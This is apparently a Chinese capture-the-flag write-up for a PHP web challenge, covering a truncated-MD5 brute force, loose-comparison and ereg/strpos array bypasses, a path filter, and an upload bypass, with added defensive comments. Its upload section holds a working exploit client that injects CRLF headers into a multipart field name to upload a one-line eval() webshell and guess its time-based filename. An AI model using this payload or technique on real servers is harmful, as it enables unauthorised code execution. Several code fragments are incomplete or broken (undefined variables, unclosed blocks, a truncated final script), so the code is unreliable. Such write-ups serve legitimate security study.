
# 0x00 前言

http://4e79618700b44607c.jie.sangebaimao.com

# 0x01 獲取源碼

#!php
// Only 6 hex digits (24 bits) of the digest are compared, so an input that passes can be
// found by brute force in at most 16^6 (~16.7M) tries, as the script below does. A gate of
// this kind should compare a full digest of a secret with hash_equals(), never a truncated one.
substr(md5(\$_GET['source']),3,6)=="81a427"

#!python
#!/bin/env python
#-*- encoding: utf-8 -*-

import md5

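def mx(str):
    """Return the hex MD5 digest of ``str``.

    Accepts ``bytes`` or text (text is UTF-8 encoded first) so the helper also
    runs on Python 3, where the legacy ``md5`` module no longer exists;
    ``hashlib`` is imported locally for the same reason.  MD5 is used only
    because the challenge's check compares a truncated MD5 -- it is not
    suitable for integrity or authentication purposes.
    """
    import hashlib
    data = str if isinstance(str, bytes) else str.encode('utf-8')
    return hashlib.md5(data).hexdigest()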

if __name__ == '__main__':
    # Search the positive integers for one whose MD5 hex digest carries the
    # target at offsets 3..8 -- the value the challenge's truncated-hash check
    # accepts. Stop at the first hit.
    target = '81a427'
    for candidate in range(1, 100000000):
        if mx(str(candidate))[3:9] == target:
            print(candidate)
            break

/index.php?source=47733

## 0x02 登陸的腦洞

#!php
}

#!php
// PHP 5/7: loose == casts the non-numeric string to 0 before comparing, so this is true.
(0 == "str")=>true
// Strict === also compares the type, so int vs string is false regardless of version.
(0 === "str")=>false
// Since PHP 8.0 the int is instead compared as a string ("0" == "str"), so 0 == "str" is
// false there too; === remains the only comparison that is safe for authentication checks.

# 0x03 二次驗證

#!php
// Fragment of the second-factor check; the enclosing block is not closed in this excerpt.
if (isset(\$_POST['salt']))
{
// ereg() (removed in PHP 7) returns NULL rather than FALSE when given a non-string such as
// an array, so the === FALSE test does not reject it, and as a C-string function it stops at
// a NUL byte. Check is_string() first and use preg_match() with an anchored pattern and
// the 'D' modifier, testing the result === 1.
if (ereg("^[a-zA-Z0-9]+\$", \$_POST['salt']) === FALSE)
{
exit('ereg');
}
// Loose comparisons on an untyped value: in PHP 5/7 strlen() of an array yields NULL
// (which is < 11) and an array compared with an int using > is TRUE. Validate the type
// before comparing; PHP 8 turns these calls into TypeErrors.
elseif (strlen(\$_POST['salt']) < 11 && \$_POST['salt'] > 999999999)
{
// strpos() on an array returns NULL in PHP 5, and NULL !== FALSE, so this branch is entered
// for array input; again the fix is rejecting non-string input up front.
if (strpos(\$_POST['salt'], '*SGBM*') !== FALSE)
{
}

ereg處理數組會得到NULL,

array() > int可以得到true,

strpos處理數組也會得到NULL

salt[]=v&submit=1

bypass ereg函数了，查到了用%00

# 0x04 PATHINFO模式

#!php
// Raw request line as sent by the client; it is attacker-controlled and is not necessarily
// the path the web server used to dispatch the request (SCRIPT_NAME / PATH_INFO are decoded
// and normalised separately).
\$URL = \$_SERVER['REQUEST_URI'];
\$matches = array();
// Whole string must consist of lowercase letters, '/' and '.' only.
preg_match('/^([a-z\/.]+)\$/', \$URL, \$matches);
// NOTE(review): what follows is a denylist -- each exit blocks one known pattern in the raw
// string. An allowlist router that canonicalises the path once and matches it against known
// routes is the safer design; comments below only record what each check rejects.
if(strpos(\$URL, './') !== FALSE){
exit('./');
}
else if(strpos(\$URL, '\\') !== FALSE){
exit('\\');
}
// Loose != on two strings; use !== so a non-match cannot be masked by type juggling.
else if(empty(\$matches) || \$matches[1] != \$URL){
exit('empty(\$matches) || \$matches[1] != \$URL');
}
else if(strpos(\$URL, '//') !== FALSE){
exit('//');
}
// Last 10 bytes must be exactly '/index.php'.
else if(substr(\$URL, -10) !== '/index.php'){
exit('substr(\$URL, -10) !== \'/index.php\'');
}
// Rejects any 'p.' sequence anywhere in the string.
else if(strpos(\$URL, 'p.') !== FALSE){
exit('p.');
}
}
// Grants the session privilege when none of the exits above fired.
else {
\$_SESSION['power'] = 1;
}
}

LN牛的提示：

# 0x05 上傳之fuzz後綴

#!php
// Upload handler excerpt (enclosing function/branch not shown). Accepts files between 1 byte
// and 100 KiB.
if(\$_FILES["file"]['size'] > 0 && \$_FILES["file"]['size'] < 102400) {
// \$_FILES[...]['type'] is the Content-Type the client declared -- it is not derived from the
// file content and is not a security control.
\$typeAccepted = ["image/jpeg", "image/gif", "image/png"];
// Extension denylist: in_array() here is case-sensitive and any extension the server also
// executes but which is not listed gets through. Prefer an allowlist of safe extensions,
// compared case-insensitively, and store uploads where the server will not execute them.
\$blackext = ["php", "php3", "php4", "php5", "pht", "phtml", "phps"];//总有一款适合你
\$filearr = pathinfo(\$_FILES["file"]["name"]);
if(!in_array(\$_FILES["file"]['type'], \$typeAccepted)) {
exit("type error");
}
if(in_array(\$filearr["extension"], \$blackext)) {
exit("extension error");
}
// Stored name is md5(time() . rand(10, 99)): only 90 possibilities for a given second, so
// it is guessable by anyone who knows the upload time. Use bin2hex(random_bytes(16)) instead.
\$filename = md5(time().rand(10, 99)) . "." . \$filearr["extension"];
\$destination_folder .= date('Y', time()) . "/" . date('m', time()) . "/";
\$file_name_path = \$destination_folder.\$filename;
// 0777 creates a world-writable directory; 0755 (or the umask default) is sufficient for
// the web server's own user. Note the './' prefix used here but not in \$file_name_path above.
if (!file_exists(\$destination_folder)) mkdir('./' . \$destination_folder, 0777, true);
} else {
}
}

#!php
<?php
// Build a gzip-compressed phar from ./virink with virink.php as both the CLI and web
// entry point. Creating archives requires phar.readonly=Off (the default is On).
\$archiveName = 'virink.phar';
\$archive = new Phar(\$archiveName, 0, \$archiveName);
\$archive->buildFromDirectory(__DIR__ . '/virink');
\$archive->setStub(\$archive->createDefaultStub('virink.php', 'virink.php'));
\$archive->compressFiles(Phar::GZ);
?>

#!php
// Excerpt of the stub generated by Phar::createDefaultStub(); not a complete listing.
Extract_Phar::go(true);
// Extension table used by the stub: a string value is served as that Content-Type, while
// an integer value appears to mean the file is handled as PHP source (2 for 'phps' is the
// highlighted variant). Note that 'inc' sits alongside 'php' here, i.e. the stub treats it
// as executable PHP even though the upload denylist above does not list it -- one more
// reason an allowlist is needed.
\$mimes = array(
'phps' => 2,
...，
'xsd' => 'text/plain',
'php' => 1,
'inc' => 1,
'avi' => 'video/avi',
...

#!php
<?php
// Upload client from the writeup, kept verbatim. Comments record what a defender should take
// from it. The excerpt appears trimmed: \$u, \$url, \$t and \$i are set or used but never
// wired together, and no request target is configured on the handle.
date_default_timezone_set('UTC');
error_reporting(0);   // also hides the undefined-variable notices this excerpt would emit
function fuck(\$ext, \$contents){
\$u = "4e79618700b44607c.jie.sangebaimao.com";
// The multipart field *name* carries CRLFs that close the name attribute and inject its own
// filename= and Content-Type headers into the part. A server that trusts those
// client-supplied part headers lets the sender choose both the stored extension and the
// MIME type the handler checks; both must be treated as untrusted input and the filename
// restricted to an allowlisted extension.
\$key = "file\";filename=shell.\$ext\r\nContent-Type:image/jpeg\r\nv:v";
\$fields[\$key] = \$contents;
\$ch = curl_init();
curl_setopt(\$ch,CURLOPT_RETURNTRANSFER,true);
curl_setopt(\$ch,CURLOPT_POST,true);
curl_setopt(\$ch,CURLOPT_POSTFIELDS,\$fields);
curl_setopt(\$ch,CURLOPT_BINARYTRANSFER,true);
\$result = curl_exec(\$ch);
curl_close(\$ch);
// Reads the server's Date header out of the response: the upload handler derives the stored
// filename from time() and rand(10, 99), so server time plus 90 guesses identifies it.
// Defender takeaway: derive upload names from random_bytes(), not from the clock.
\$tt = substr(\$result,strpos(\$result,'Date')+11,20);
\$t = strtotime(\$tt);
if(strpos(\$result,'success') === FALSE)
die('error');
// Probe loop over the same 10..99 range as the handler's rand(); \$url is not assigned in
// this excerpt.
for(\$i = 10; \$i<100;\$i++){
\$f = file_get_contents(\$url);
if (\$f && strpos(\$f,'virink') !== FALSE){
print \$url;
break;
}
}
}
// Payload: a one-line eval() webshell followed by a marker string the probe searches for.
// Detection: scan uploaded content for PHP open tags / eval() regardless of extension, and
// deny script execution in upload directories so a stored file cannot run.
\$contents =<<<TEXT
<?php eval(\\$_POST[999]);?>virink
TEXT;
\$ext = 'inc';
fuck(\$ext, \$contents);
?>

## 0x06 什麼鬼？Misc

getshell之後果真很蛋疼，很奔溃！

imstudy(214329772) 1:44:30

#!python
#!/bin/env python
#-*- encoding: utf-8 -*-
# __author__ : Virink

from PIL import Image
import math

if __name__ == '__main__':
j = int(math.sqrt(count))
i = j+2
for k in range(0,i/4):
sx = i-k
sy = j+k
if (sx * sy) == count:
break
c = Image.new("RGB",(sx,sy))
file = open('flag.txt')
for x in range(0,sx):
for y in range(0,sy):